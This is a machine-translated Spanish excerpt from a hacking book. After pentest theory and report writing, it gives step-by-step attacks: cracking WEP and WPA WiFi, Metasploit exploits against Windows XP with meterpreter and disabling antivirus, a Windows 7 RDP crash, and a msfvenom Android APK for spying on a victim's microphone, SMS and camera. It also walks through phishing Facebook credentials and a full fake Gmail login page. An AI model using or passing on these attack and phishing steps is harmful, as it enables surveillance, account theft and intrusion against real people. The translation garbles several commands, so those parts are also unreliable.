Está en la página 1de 45

Pruebas manuales y automatizadas

Los probadores de penetración dividen las pruebas en dos categorías: manual y automatizado. Las pruebas manuales se basan en las

habilidades de un hacker de sombrero blanco. El probador tiene control completo sobre el proceso. Si comete un error, toda la prueba de

penetración puede resultar inútil. Las pruebas automatizadas, por otro lado, no necesitan intervención humana. Una vez que se ejecuta la

prueba, la computadora se encargará de todo: desde la selección de objetivos hasta el registro de los resultados.

En esta parte del libro, aprenderá información importante sobre este tipo de pruebas. Debes dominar este concepto

si te tomas en serio la piratería. Con este conocimiento, puede determinar fácilmente el tipo de prueba que debe

usarse en cualquier situación.

Pruebas de penetración manual

Realizará pruebas manuales la mayor parte del tiempo. Aquí, utilizará sus herramientas, habilidades y conocimientos para encontrar

las debilidades de una red. Las pruebas manuales implican los siguientes pasos:

Investigación: este paso tiene una gran influencia en todo el proceso. Si tienes mucha información sobre tu

objetivo, atacarlo será fácil. Puede realizar investigaciones utilizando internet. Por ejemplo, puede buscar

información específica manualmente o ejecutar sus herramientas de piratería.

Kali Linux tiene una amplia gama de herramientas que puede utilizar en esta fase de "reconocimiento". Con los programas integrados

de Kali, puede recopilar fácilmente datos sobre sus objetivos (por ejemplo, hardware, software, base de datos, complementos, etc.).

Evaluación de debilidades: analice la información que recopiló e identifique las debilidades potenciales del

objetivo. Su conocimiento y experiencia lo ayudarán en esta tarea. Obviamente, primero debes trabajar en

las debilidades obvias. Esto se debe a que estas debilidades atraen a los hackers de sombrero negro.

Explotación: ahora que conoce las debilidades específicas de su objetivo, debe realizar un ataque. Usted

"explotará" una debilidad atacándola con una herramienta de hackeo.

Preparación y envío de resultados: registre toda la información que recopiló durante la prueba. Organice los

datos para que sus clientes puedan determinar fácilmente los próximos pasos. Asegúrese de que su informe se

explique claramente. No uses jerga.


Los hackers de sombrero blanco dividen las pruebas de penetración manual en las siguientes categorías:

Pruebas integrales: este tipo de prueba cubre una red completa. Una prueba exhaustiva tiene como objetivo

determinar las conexiones entre las partes de un objetivo. Sin embargo, las pruebas exhaustivas requieren

mucho tiempo y son situacionales. Pruebas enfocadas: las pruebas que pertenecen a esta categoría se

concentran en un riesgo o vulnerabilidad específicos. Aquí, el hacker usará sus habilidades para identificar y

explotar ciertas vulnerabilidades en una red.

Pruebas de penetración automatizadas

Las pruebas automatizadas son fáciles, rápidas, confiables y eficientes. Puede obtener informes detallados con solo

presionar un botón. El programa se encargará de todo en su nombre. En general, los programas utilizados en esta prueba

son aptos para novatos. No requieren habilidades o conocimientos especiales. Si puede leer y usar un mouse, está listo para

comenzar. Los programas más populares para pruebas automatizadas son Metasploit, Nessus y OpenVA. Metasploit es un

marco de piratería que puede lanzar ataques contra cualquier sistema operativo. Los hackers consideran a Metasploit como

su arma principal. Pruebas de infraestructura

Un sistema informático o red generalmente consta de múltiples dispositivos. La mayoría de estos dispositivos juegan un papel

importante para mantener el sistema / red estable y efectivo. Si uno de estos dispositivos funciona mal, todo el sistema o la red

podrían sufrir. Esa es la razón por la cual los probadores de penetración deben atacar la infraestructura de sus objetivos.

Los fundamentos de las pruebas de infraestructura

Una prueba de infraestructura involucra redes informáticas internas, conexión a internet, dispositivos externos y

tecnología de virtualización. Analicemos esto en detalle:

Pruebas de infraestructura interna: los piratas informáticos pueden aprovechar las fallas en la seguridad

interna de una red. Al probar la estructura interna de un objetivo, podrá identificar y resolver las debilidades

existentes. También evitará que los miembros de la organización ataquen la estructura desde adentro.

Pruebas de infraestructura externa: estas pruebas simulan ataques de sombrero negro. Debido a que los

hackers malintencionados atacarán una red desde el exterior, es importante verificar si los mecanismos de

defensa externos de esa red son fuertes.


Pruebas de red inalámbrica: la tecnología WiFi le permite conectar dispositivos indirectamente. Aquí, los

paquetes de datos simplemente viajarán de un dispositivo a otro. Esta tecnología ofrece comodidad. Sin embargo,

la conveniencia crea vulnerabilidad. Los hackers pueden

buscar paquetes de datos que se envían en una red. Una vez

Aircrack-ng, Wireshark o herramientas similares obtienen estos paquetes de datos, la red será propensa a ataques de

piratería.

Una prueba de red inalámbrica permite al hacker de sombrero blanco mejorar las defensas del objetivo contra los ataques

inalámbricos. El probador también puede usar sus hallazgos para crear pautas para los usuarios finales de la red.

Pruebas de virtualización e infraestructura de la nube: almacenar información relacionada con la empresa en servidores de

terceros es extremadamente riesgoso. Los piratas informáticos pueden capturar los datos a medida que van al servidor "en

la nube". También pueden atacar el servidor en la nube y acceder a toda la información almacenada allí. Debido a que el

incidente ocurrió fuera de la red, el seguimiento de los culpables puede ser extremadamente difícil.
Cómo escribir un informe

Sus esfuerzos se desperdiciarán si no registra sus resultados. Para convertirse en un exitoso hacker de sombrero

blanco, debe saber cómo escribir buenos informes. En esta parte del libro, descubrirá consejos, trucos y técnicas

importantes para escribir informes para pruebas de penetración.

Elementos principales de un informe


Objetivos: describa el propósito de su prueba. Puede incluir las ventajas de las pruebas de penetración en

esta parte del informe.

Tiempo: debe incluir la marca de tiempo de las actividades que realizará. Esto le dará una descripción precisa

del estado de la red. Si se produce un problema más adelante, el hacker puede usar las marcas de tiempo de

sus actividades para determinar la causa del problema.

Audiencia: el informe debe tener una audiencia específica. Por ejemplo, puede dirigir su informe al

equipo técnico de la compañía, al gerente de TI o al CEO. Clasificación: debe clasificar el documento, ya

que contiene datos confidenciales. Sin embargo, el modo de clasificación depende de su cliente.

Distribución: su informe contiene información confidencial. Si un hacker de sombrero negro tiene acceso a ese

documento, la red que estaba destinado a proteger se apagará. Por lo tanto, su informe debe indicar el número

total de copias que realizó, así como las personas a las que las envió. Cada informe debe tener un número de

identificación y el nombre de su destinatario.

Recolección de datos

Las pruebas de penetración implican procesos largos y complejos. Como resultado, debe describir cada pieza de

información que recopilará durante el ataque. Describir tus técnicas de piratería no es suficiente. También debe

explicar sus evaluaciones, los resultados de sus escaneos, así como la salida de sus herramientas de piratería.

Creando tu primer borrador


Escriba el borrador inicial de su informe después de recopilar toda la información que necesita. Hacer
Seguro que este borrador está lleno de detalles. Concéntrese en los procesos, experiencias y actividades relacionadas con su prueba.

Corrección de pruebas

Los errores tipográficos y / o gramaticales pueden arruinar su informe. Por lo tanto, debe revisar su trabajo y asegurarse de

que esté libre de errores. Una vez que esté satisfecho con su resultado, solicite a sus colegas que lo verifiquen. Este enfoque

lo ayudará a producir excelentes informes.

Esquema de un informe de prueba


1. Resumen Ejecutivo
1. Alcance y limitaciones del proyecto
2. Objetivos
3. Suposiciones
4. Cronología

5. Resumen de resultados

6. Resumen de sugerencias
2. Metodología
1. Formulación del plan

2. Ejecución del ataque


3. Informes
3. Hallazgos

1. Información detallada sobre el sistema


2. Información detallada sobre el servidor
4. Referencias

1. Apéndice
El aspecto legal de las pruebas de penetración

Como hacker, tratará con datos confidenciales relacionados con una empresa u organización. Pueden ocurrir accidentes y la

información puede filtrarse a otras personas. Eso significa que debe estar preparado para los problemas legales que puedan

surgir en sus proyectos de piratería. Esta parte del libro discutirá el aspecto legal de la piratería. Lea este material

detenidamente: puede ayudarlo a evitar demandas y problemas similares.

Problemas legales

Estos son algunos de los problemas legales que puede enfrentar:

Fuga de información confidencial Pérdidas financieras

causadas por pruebas defectuosas

Puede evitar los problemas mencionados anteriormente asegurando una "declaración de intenciones". Esta declaración prueba el

acuerdo entre el cliente y el probador. Este documento describe todos los detalles relacionados con la prueba de penetración. Utilizará

una declaración de intenciones para evitar problemas legales en el futuro. Por lo tanto, ambas partes deben firmar el documento antes

de que comience la prueba.


Capítulo 6: Técnicas de piratería específicas

Este capítulo le enseñará varias técnicas de piratería. Estas técnicas son básicas, pero extremadamente efectivas.

Funcionan en diferentes situaciones: puede usarlos durante la práctica o al probar una red. Además, confían en

herramientas que están presentes en Kali Linux. Si está utilizando Kali como sistema operativo para sus actividades de

piratería, no tendrá que descargar ninguna herramienta adicional.

Nota importante: Kali Linux es un sistema operativo especialmente diseñado para hackers y probadores de penetración. No está

destinado a reemplazar Windows u OS X. Puede instalar Kali en una unidad flash para que no tenga que desinstalar el sistema

operativo de su computadora. Siempre que necesite piratear algo, simplemente conecte su unidad flash en una computadora portátil /

computadora de escritorio y listo. Todas tus herramientas de piratería están dentro de tu bolsillo, literalmente.
Cómo hackear redes WiFi que usan encriptación WEP

Cada vez más personas usan redes inalámbricas. Por lo tanto, cada hacker necesita saber cómo atacar este tipo de

objetivo. En esta sección, usará Kali Linux para hackear una contraseña WiFi cifrada con WEP.

Nota importante: Todavía estás practicando, así que no lo uses en la red de otras personas. Sería mejor si

creara su propia red inalámbrica. Hay muchos videos en YouTube sobre esa tarea. Mirar videos e instalar

una red es mejor que ser arrestado por atacar el WiFi de su vecino. Nunca olvides: el pirateo no autorizado

es ilegal. Para hackear una contraseña encriptada WEP, debe hacer lo siguiente:

1. Determine la ID del adaptador inalámbrico de su computadora.

Cada computadora contiene múltiples adaptadores de red. Su primera tarea es buscar el adaptador inalámbrico

y ver su nombre. Este paso es rápido e indoloro: solo tiene que abrir un terminal, escriba " ifconfig ", Y presiona la

tecla Enter. Su pantalla le mostrará algo como esto:

La mayoría de las computadoras le darán tres adaptadores: eth, lo y wlan. Para esta tarea, debe centrarse en el adaptador

"wlan". La imagen de arriba muestra que el nombre del adaptador inalámbrico es "wlan1".

2. Ejecute el programa Airmon-ng.

"Airmon-ng" es parte de la suite "Aircrack-ng". Le permite generar una interfaz de monitoreo para el ataque. Para

activar este programa, simplemente escriba " airmon-ng start wlan_ID ".
Reemplace "wlan_ID" con el nombre de su adaptador (por ejemplo, airmon-ng start wlan1 "). Su pantalla le

mostrará esto:

3. Capture paquetes de datos de su red de destino.

Ahora, debe recopilar algunos paquetes de datos disponibles en su área. Necesitas usar una herramienta llamada

"airodump-ng" para esto. Básicamente, "airodump-ng" (que es otro miembro de la suite aircrack-ng) busca paquetes de

datos y le muestra todas las redes WiFi existentes cerca de usted.

El comando que debe escribir es:

airodump-ng wlan0mon.

El terminal le mostrará una lista de redes disponibles. Aquí hay un ejemplo:


4. Guarde los paquetes de datos como un archivo "cap".

Puede realizar esta tarea emitiendo el comando "-write" a airodump-ng. El código que debes usar es:

airodump-ng wlan0mon —escribe FileName

Simplemente reemplace "FileName" con el nombre de archivo que desea usar. Supongamos que desea utilizar "práctica" como

archivo. El código se convierte en:

airodump-ng wlan0mon: muestra de escritura

La información se guardará en un archivo llamado "sample.cap".

5. Ejecute un cracker de contraseñas.

Inicie otra terminal y ejecute "aircrack-ng" para identificar la contraseña de la red. Simplemente escriba el nombre del

programa y especifique el archivo cap que creó anteriormente. Para este ejemplo, el comando es:

muestra de aircrack-ng

Es posible que su archivo contenga más de una red WiFi. Si ese es el caso, aircrack-ng le pedirá que
especifique el que desea atacar. Siga las instrucciones en pantalla y espere a que el programa complete
el proceso. El código resultante tendrá dos puntos (":") en él. Puede obtener la contraseña de la red
eliminando los dos puntos. Por ejemplo, si obtuvo EX: AM: PL: ES, la contraseña de la red es
EJEMPLOS.
Cómo hackear redes WiFi que usan cifrado WPA / WPA-2

Las contraseñas cifradas con WEP son fáciles de hackear. Las contraseñas WPA / WPA-2, sin embargo, consumen mucho

tiempo y requieren muchos recursos. Esta es la razón por la cual la mayoría de las redes WiFi usan encriptación WPA / WPA-2.

Romper esta forma de cifrado es difícil, pero ciertamente factible. Estos son los pasos que debe seguir:

1. Inicie una terminal y ejecute airmon-ng.

Tipo:

airmon-ng start wlan_ID

Reemplace "wlan_ID" con el nombre de su adaptador.

2. Capture paquetes de datos utilizando el programa airodump-ng.

Puede completar esta tarea escribiendo

airodump-ng wlan0mon

3. Guarde los paquetes dentro de un archivo cap.

4. El comando que debe escribir es:

airodump-ng wlan0mon —escribe NameofFile

5. Tome nota del BSSID de su objetivo e inicie el programa llamado " aireplay-
ng ".

Encontrará el BSSID de una red en la pantalla airodump-ng. Después de obtener esa información, escriba:

aireplay-ng —deauth 0 –a BSSID wlan0mon

Reemplace "BSSID" con el BSSID de su objetivo.

6. Use la siguiente sintaxis:


aircrack-ng NameofFile.cap –w dictionary.txt

7. Reemplace "NameofFile.cap" con el archivo cap que generó. Luego, reemplace "dictionary.txt" con el archivo de

diccionario que desea usar para el proceso. Un archivo de diccionario es un archivo de texto que contiene

posibles contraseñas. Kali Linux tiene varios archivos de diccionario que puede usar.

8. Espere a que el programa complete el proceso. Si su archivo de diccionario elegido contiene la contraseña

cifrada, aircrack-ng le dará un resultado positivo. Sin embargo, si la contraseña no está en el archivo de

texto, el programa le pedirá que especifique otro diccionario.


Cómo hackear Windows XP

Windows XP es un viejo sistema operativo. De hecho, Microsoft dejó de emitir actualizaciones para este sistema operativo. Sin embargo,

muchas personas todavía usan XP en sus computadoras. Debido a que este sistema operativo no recibirá actualizaciones futuras, sus

vulnerabilidades existentes estarán siempre disponibles para los piratas informáticos y los evaluadores de penetración.

Esta sección le enseñará cómo atacar Windows XP usando el marco Metasploit. El autor supone que está

utilizando Kali Linux y que tiene una máquina virtual que ejecuta Windows XP. Las máquinas virtuales le

permiten ejecutar múltiples sistemas operativos (en este caso, Kali Linux y Windows XP) en una sola

computadora. Hay muchos materiales de instrucción sobre máquinas virtuales en YouTube.

Nota importante: asegúrese de estar utilizando una máquina virtual. La práctica de esta técnica de piratería en una

computadora con Windows XP real puede ocasionar serios problemas. Si algo malo sucede en una máquina virtual, puede

reiniciarlo presionando algunos botones. Romper una computadora XP real, por otro lado, puede generar costos de

reparación.

El proceso
Debes entrar en una red antes de hackear las computadoras conectadas a ella. Sin embargo, esta lección no requiere

ningún ataque de red. Esto se debe a que el sistema operativo XP está instalado en su computadora Kali. Por lo tanto, la

máquina virtual XP pertenece a la red de su computadora.

Para hackear una computadora con Windows XP, debes:

1. Inicie Metasploit Framework en su sistema operativo Kali Linux.

Inicie una terminal y escriba:

servicio postgresql start

Este comando activa PostgreSQL en su computadora. PostgreSQL sirve como la base de datos de Metasploit, por lo

que debe ejecutarlo primero antes de activar el programa en sí. Ahora, escriba:

servicio de inicio de metasploit

Y
msfconsole

Si hiciste todo bien, tu terminal debería verse así:

2. Utilice la función de "escaneo de puertos" de Metasploit para encontrar objetivos.

El marco Metasploit viene con varias herramientas auxiliares. Port Scan es una de las mejores herramientas presentes en este

marco. Esta herramienta le permite escanear todos los puertos de una máquina. Puede proporcionarle información detallada

sobre los puertos abiertos de su objetivo. Como saben, un puerto sirve como puerta de entrada para los hackers. Un puerto

abierto es una puerta abierta. Active Port Scan ingresando este comando:

utilizar auxiliar / escáner / portscan / tcp

Visualice las opciones de escaneo disponibles escribiendo:

mostrar opciones

Por defecto, Port Scan verificará cada puerto presente en el sistema. No desea que esto suceda, ya que todo el

proceso llevará mucho tiempo. Sería mejor si especificaras el rango de puertos a comprobar. Aquí hay un

ejemplo:

establecer puertos 1-600


Ahora, debe especificar la dirección IP de su objetivo. Este paso es complicado ya que las direcciones IP pueden variar.

Para este ejemplo, debe acceder a la máquina virtual XP e iniciar un símbolo del sistema. Escriba "ipconfig" y busque la

dirección IP de la máquina. Supongamos que la dirección IP de su máquina virtual es 192.168.62.122. Regrese a su

sistema operativo Kali e ingrese lo siguiente:

establecer RHOSTS 192.168.62.122

Tipo " correr "Para comenzar el proceso. Metasploit mostrará todos los puertos abiertos presentes en su máquina virtual. Si el

escaneo no mostró ningún puerto abierto, regrese a su sistema operativo XP y apague su firewall. Luego, ejecute el escaneo

nuevamente. Supongamos que el escaneo descubrió dos puertos abiertos: 135 y 445.

Nota importante: en la práctica real, no sabrá la dirección IP de su objetivo. Eso significa que necesita usar NMAP

para encontrar objetivos y sus direcciones IP.

3. Búsqueda de exploits.

Esta es una de las fases más importantes del ataque. Debes encontrar un exploit que funcione en tu objetivo elegido. Salga de

Port Scanner escribiendo " espalda ". En la pantalla principal de msfconsole, escriba " buscar dcom ". El exploit "dcom" es una de

las mejores herramientas que puede usar para hackear una computadora XP.

Metasploit le mostrará los resultados de la búsqueda. Buscar el módulo llamado


"Explotar / windows / dcerpc / ms03_026_dcom" y copie su nombre. Luego, escriba lo siguiente:

use exploit / windows / dcerpc / ms03_026_dcom

Visualice las opciones disponibles escribiendo:

mostrar opciones

Indique la dirección IP de su objetivo. Aquí está el código:

establecer RHOST 192.168.62.122


Elige la carga útil para tu ataque. La carga útil determina lo que sucederá una vez que haya violado las defensas

del objetivo. Puede establecer un terminal abierto o plantar un virus. Hay miles de cargas disponibles en el marco

Metasploit. Para encontrar la carga correcta para su ataque actual, escriba:

cargas útiles

4. La carga útil ideal para esta lección es "windows / shell_bind_tcp". Esta carga útil abre un shell (o símbolo del

sistema) en el destino a través de un puerto TCP. Puede configurar esta carga útil escribiendo:

establecer PAYLOAD windows / shell_bind_tcp

5. Ahora que ha especificado cada aspecto del ataque, escriba " correr ".

6. Metasploit le dirá que se ha abierto un shell en su computadora de destino. Ese shell le otorga privilegios de

administrador sobre su objetivo. Puede descargar archivos de esa computadora o enviarle programas.

También puede obtener capturas de pantalla de la computadora si lo desea.

Cómo usar un Meterpreter en una computadora XP

Los medidores de presión son las cargas útiles más fuertes que puede usar. Le dan un control completo sobre la máquina

infectada. En esta lección, sabrá cómo enviar un medidor de precisión utilizando Metasploit.

Nota importante: este proceso es similar al anterior. La única diferencia es que usará un tipo diferente de
carga útil. Para mantener este libro breve, usemos la información que recopiló anteriormente (la dirección IP
y los puertos abiertos). Las etapas restantes del ataque son:

1. Identifique la dirección IP de su computadora Kali Linux.

Las cargas útiles tienen diferentes requisitos. Por ejemplo, una carga útil solo puede necesitar la dirección IP de su objetivo. Sin

embargo, algunas cargas útiles requieren la dirección IP del ataque, y los medidores pertenecen a este grupo. Eso significa que

debe configurar la IP de su computadora como LHOST de una carga útil de metropreter.

Si no conoce la dirección IP de su computadora Kali, inicie una terminal y escriba:


" ifconfig ". El terminal mostrará la información que necesita.

2. Inicie el marco Metasploit.

Elija un exploit, establezca el RHOST e indique la carga útil. Para esta lección, el exploit que debe usar es

"ms08_067_netapi". Este exploit es el exploit más popular para las computadoras XP. Establezca la carga útil de

meterpreter escribiendo:

windows / meterpreter / reverse_tcp

3. Escriba "explotar" para lanzar el ataque. Aparecerá un shell de meterpreter en su computadora de destino. Este shell te

permite hacer muchas cosas. Para ver las opciones disponibles, simplemente escriba un signo de interrogación. Estas

son algunas de las opciones:

1. sysinfo: este comando le brinda información importante sobre su objetivo.

2. getpid: con este comando, puede identificar el programa que utiliza actualmente su meterpreter.

3. getuid: use este comando para obtener información sobre el usuario que atacó.

4. ps: este comando muestra todos los procesos activos en el sistema.

5. Ejecute killav: este comando puede desactivar el antivirus de su sistema de destino. Úselo si

planea inyectar algunos programas maliciosos en la computadora que hackeó.


Cómo bloquear una computadora con Windows 7

Puedes hackear Windows XP fácilmente. Sin embargo, sus "hermanos" más jóvenes (Windows 7, 8 y 10) son muy difíciles

de roer. Estos sistemas modernos no tienen vulnerabilidades sin resolver. Eso significa que no puede ejecutar un exploit

directamente cuando piratea un sistema operativo moderno. En esta sección, su objetivo es derribar una computadora con

Windows 7 utilizando el marco Metasploit. Si tiene éxito, la máquina de destino mostrará una pantalla azul con algo de

galimatías. Este proceso es extremadamente fácil cuando se realiza a través de una red de área local. Nota importante:

debe tener Windows 7 en una máquina virtual. Recuerde: no practique sus habilidades de piratería en una computadora

real. Los resultados pueden ser desastrosos. Dividamos el proceso en varios pasos:

Recolección de datos

Debe determinar la dirección IP de su objetivo. Durante una prueba de penetración real, este proceso puede ser

difícil. Debe encontrar la dirección IP de una computadora sin ser detectado. En esta lección, sin embargo,

identificar la dirección IP es rápido y fácil. Solo tiene que acceder a su máquina virtual, iniciar un shell e ingresar

"ipconfig". Busque la línea que dice IPv4.

Lanzamiento de Metasploit

Regrese a su sistema operativo Kali Linux y abra una terminal. Luego, inicie el marco Metasploit emitiendo los

siguientes comandos:

servicio postgresql inicio

servicio metasploit inicio

msfconsole

La consola "msf" (Metasploit Framework) aparecerá en su terminal actual.

Ejecutando el ataque
Elige el exploit para este ataque. El comando que debe emitir es:
use auxiliares / dos / windows / rdp / ms12_020_maxchannelids

Tipo " mostrar opciones "Para ver las opciones que ofrece este exploit. Encontrará que tiene dos requisitos: RPORT y

RHOST. Establezca "3389" como RPORT, ya que es el puerto para escritorios remotos. Establezca la dirección IP de su

objetivo como RHOST. Luego, escriba " explotar ". Su máquina de destino mostrará una pantalla azul y se reiniciará. Los

usuarios de computadoras se refieren a esa pantalla azul como "pantalla azul de la muerte". Metasploit te permite realizar

este truco muchas veces. En el mundo real, este ataque puede ser frustrante. Imagine lo que haría una persona si su

computadora se reinicia.
Cómo hackear un teléfono Android

Metasploit tiene un potente generador de carga útil llamado "msfvenom". Con msfvenom, puede crear cargas útiles para

cualquier dispositivo que desee hackear. En esta lección, usarás msfvenom para hackear un teléfono Android. Aquí

están los pasos:

1. Acceda a su computadora Kali Linux e inicie una terminal.

2. Especifique la carga útil y genere un archivo ejecutable. El comando que debe escribir es:

root @ kali : - # msfvenom –p android / meterpreter / reverse_tcp LHOST = 192.168.0.110 LPORT = 4444 R>

andro.apk

Nota importante: establezca su propia dirección IP en la sección LHOST del código. Además, no agregue caracteres de espacio

extra a este código.

3. Este proceso generará un archivo apk, que es un archivo ejecutable para dispositivos Android. Envía e instala

este archivo apk en el teléfono que quieras hackear.

4. Inicie Metasploit escribiendo "msfconsole".


5. Active la herramienta de manejadores múltiples de Metasploit y configúrela. Utilizará el controlador múltiple para

controlar el archivo apk que envió. Los comandos que debe escribir son:

uso / multi / controlador

establecer la carga útil android / meterpreter / reverse_tcp establecer

LHOST (inserte su dirección IP aquí) establecer LPORT 4444 exploit

6. Metasploit lanzará el controlador de carga útil. Ahora, solo tiene que esperar hasta que su víctima inicie la aplicación instalada

en su dispositivo. El nombre de esta aplicación es "ACTIVIDAD PRINCIPAL". Obtendrá un terminal meterpreter en el

dispositivo de destino tan pronto como se ejecute la aplicación.

7. Aproveche el dispositivo pirateado emitiendo comandos. Aquí hay algunos comandos que puede
usar:
1. geolocalizar: este comando le permite localizar el dispositivo de destino.

2. record_mic: este comando activa el micrófono del dispositivo pirateado. El micrófono grabará

cada sonido que haga su víctima. Esta información será enviada a su computadora.

3. dump_sms: con este comando, puede obtener los mensajes de texto presentes en el dispositivo de destino.

4. webcam_stream: este comando inicia una sesión de transmisión utilizando la cámara web del dispositivo

de destino.

5. webcam_snap: use este comando para tomar una foto con la cámara del teléfono pirateado.

6. dump_contacts: este comando captura todos los contactos presentes en el dispositivo de destino.
Cómo hackear una cuenta de Facebook

El sistema de Facebook utiliza mecanismos modernos de seguridad. Es extremadamente difícil superar sus defensas y

obtener información sobre sus usuarios. Afortunadamente, no tiene que atacar a Facebook directamente (a menos que

quiera derribar el sitio). Si solo planea robar la información de inicio de sesión de otras personas, puede usar una

herramienta de phishing desde su computadora Kali Linux.

En esta lección, creará una página de inicio de sesión falsa de Facebook. Enviarás esta página web falsa a los usuarios de Facebook. Una

vez que una persona inicia sesión, obtendrá toda la información que ingrese.

Credential Harvester - The Basics


Credential Harvester es miembro de la caja de herramientas de ingeniería social de Kali. Puede crear una página de phishing

y enviar credenciales de inicio de sesión al hacker. Esta herramienta crea una dirección IP para el ataque. Como hacker,

puede modificar la dirección IP resultante para que sea más creíble.

El proceso
Para usar la herramienta Credential Harvester, debe:

1. Acceda a su computadora Kali Linux e inicie una terminal.

2. Emita el " setoolkit "Comando.


3. Encontrará los términos y condiciones del kit de herramientas. Escriba "y" y presione la tecla Intro.

4. El terminal enumerará todas las opciones disponibles. Ingrese "1", "2" y "3". Esto lanzará la herramienta

Credential Harvester.

5. Elija la opción que dice "Site Cloner".


6. Ingrese los siguientes detalles:

1. Su dirección IP
2. La URL del sitio web que desea clonar
7. Minimice la terminal y vaya a "Lugares". Haga clic en "Computadora", presione "VAR" y abra el "directorio

WWW". Transfiera todos los archivos dentro de "www" a "html".

8. Visita www.tinyurl.com para acortar la dirección IP. Una vez que un usuario de Facebook hace clic en

su enlace e ingresa sus credenciales de inicio de sesión, Credential Harvester registrará la información por usted.

Almacenará la información dentro de un archivo de texto, que se encuentra


en el directorio WWW (ver arriba).
Cómo hackear una cuenta de Gmail

Esta lección se centrará en una herramienta de piratería popular llamada Wapka. Esta herramienta puede ayudarlo a recopilar las

credenciales de inicio de sesión de Gmail de sus víctimas.

Wapka - Lo básico
Wapka es una plataforma de creación de sitios. Ofrece sitios web gratuitos y servicios de alojamiento. Con esta

herramienta, puede crear un sitio de phishing efectivo en solo unos minutos. Además, Wapka no requiere un amplio

conocimiento sobre PHP y MySQL.

Los requisitos
1. Un objetivo

2. Familiaridad con Gmail

3. Familiaridad con los códigos HTML.

4. Familiaridad con la creación del sitio web.

5. Una cuenta de Gmail

El proceso
1. Visita http://u.wapka.com/wap/en/signup y crea una cuenta Wapka.
2. Acceda a su cuenta, busque "Lista de sitios" y haga clic en "Crear nuevo sitio".

3. Especifique el nombre de su sitio web. Wapka te permite combinar números y letras. No puedes usar
ningún personaje especial. Para esta lección, supongamos que el nombre de su sitio es "sitio de
muestra". La URL de su sitio web será "samplesite.wapka.mobi".

4. Active el modo Administrador de su nuevo sitio.

5. Verá una página web en blanco. Está vacío porque no ha hecho nada en su sitio. Busque el enlace que

dice "EDITAR SITIO" y haga clic en él.

6. En la siguiente pantalla, presione el enlace "Formulario de correo".

7. Asegúrese de que CAPTCHA esté desactivado. Haga clic en "Enviar y recordar".

8. Vuelva a la lista de sitios e inicie el sitio web en el que está trabajando. Esta vez, no active el modo

Administrador. Mire la parte inferior de la página web y presione "Visor de código fuente".
9. Coloque la URL de su sitio dentro del cuadro grande. Verás muchas casillas de verificación. Busque una entrada

que se parezca a "value = xxxxx". Toma nota de ese valor.

10) Active el modo Administrador, haga clic en "Editar sitio" y elija "Usuarios".

11) Haga clic en "Visibilidad de elementos" y seleccione "Visible solo en modo administrador".

12) Acceda nuevamente al sitio y active el modo Administrador. Haga clic en "EDITAR SITIO"

y "CÓDIGO WML / HTML". Pegue el siguiente código en la página:

<? xml version = "1.0"?>

<! DOCTYPE wml PUBLIC “- // WAPFORUM // DTD WML 1.1 // ES”

“http://www.wapforum.org/DTD/wml_1.1.xml”> <wml> <head>

<meta forua = "true" http-equiv = "Cache-Control" content = "max-age = 0" /> </head>

<template>

<do type = “options” name = “Prev” label = “Back”> <prev /> </do> </template>

<card id = "index" title = "Wapka.mobi">

<p> <script type = "text / javascript"> document.title = "Iniciar sesión"; </script> <title> Iniciar sesión </title>

<link rel = “icono de acceso directo” type = “image / x-icon” href =

“http://greentooth.xtgem.com/i3/gs1.png” /> <div> <div> <body dir =

“ltr "

style = "background-color: #eee; font-family: arial, helvetica, sans-serif; tamaño de fuente: 13px; relleno: 0; margin:

0; ”> <div style =“ margin: 10px; ”/>

<img src = ”// ssl.gstatic.com/accounts/ui/logo_sm.png” border = “0”

align = “bottom” alt = “Google” />


<div style = "font-size: 17px;"> Iniciar sesión

</div>

</body> </div>

</div>

<div> <div> <div style = “background-color: #fff; color del borde: # e5e5e5; ancho de borde: 1px 0 1px 0; estilo

de borde: sólido; relleno: 10px 0 10px 10px; margen: 0; ”> <form method =“ post ”class =“ mobile-login-form ”

onSubmit = "window.open ('https://accounts.google.com/ServiceLogin? service = mail & amp; passive =

true & amp; continue = https: //mail.google.com/mail/?

ui% 3Dmobile% 26zyp% 3Dl & amp; scc = 1 & amp; ltmpl = ecobx & amp; nui = 5 & amp; btmpl = mobile & amp; emr = 1 ') ”actio

<div class =“ label ”> <b> Nombre de usuario </b> </div> <input type = “text” name = “mf_text [email]” value = ”” class = “textbox”

“label”> <b> Contraseña </b> </div>

<input type = “password” name = “mf_text [password]” value = ”” class = “textbox” /> <br/>

<input type = "hidden" name = "p" value = "125256565" />

<input type = “checkbox” name = “autologin_ch” value = “1” /> Manténgase conectado <br/> <input type = “hidden”

name = “action” value = “send_message” /> <input type = “ submit ”name =“ MF_submit ”value =” Iniciar sesión

”class =“ button ”/> </form> </div> <div> <div style =“ margin: 10px; ”> ¿Nuevo en Gmail? Es gratis y fácil. <br/>

<a id = “link-signup” href = “https://accounts.google.com/NewAccount? btmpl = mobile_tier2 & amp; service = mail &

amp; continue = https: //mail.google.com/mail/x/e-

% 3Fpc% 3Dmobile & amp; SuWt = CgRtYWlsEnJodHRwczovL20uZ29vZ2xlLmNvbS9hcHAvcGx1cy8_bG9naW49MSZwY

<div style = “margin: 10px; tamaño de fuente: 11px; ">


© 2015 Google | <a href= olvidarhttp://m.google.com/tospage?hl=en"> Términos de servicio </a> | <a href=

olvidarhttp://m.google.com/privacy?hl=en"> Política de privacidad </a> | <a href=

olvidarhttp://m.google.com/m/help?hl=en"> Ayuda </a> </div></div> </div> </div> </p>

<p><noscript/> </p> <p align = “center”> <a href="/menu_0.wml">: =: </a> </p> <p style = “text-align:
centro; "> <a
href = ”/ ads / wapka / p / 2462629 / adshows / 0 / aid / 23 / country / US / position / bottom”> <img src = ”/ pictures /

9apps.png” /> <br /> Las aplicaciones más populares y Descarga de juegos y fondos de pantalla </a> </p> <img src = ”/

ga.gif? Utmac = MO-324718051 & amp; utmn = 1113259389 & amp; utmr = -

& amp; utmp =% 2Findex.xhtml & amp; guid = ON ”width =“ 1 ”height =“ 1 ”/> <img src =“

http://ga.wapka.me/ga3.gif?utmac=MO-46050634-

1 & amp; utmn = 20217942 & amp; utmr = - & amp; utmp =% 2Findex.xhtml & amp; guid = ON ”width =" 1 "height

=" 1 "/> </card> </wml>

13) Busque la entrada "value = xxxxx" y reemplácela por la que


copiado antes

¡Felicidades! Usted creó su propio sitio de phishing para usuarios de Gmail. Una vez que un usuario de Gmail accede a esa página e

intenta iniciar sesión, obtendrá sus credenciales de inicio de sesión.

Las cosas que debes saber


Facebook bloquea todas las URL relacionadas con Wapka. Eso significa que no puedes suplantar las contraseñas de Gmail con

tu cuenta de Facebook.

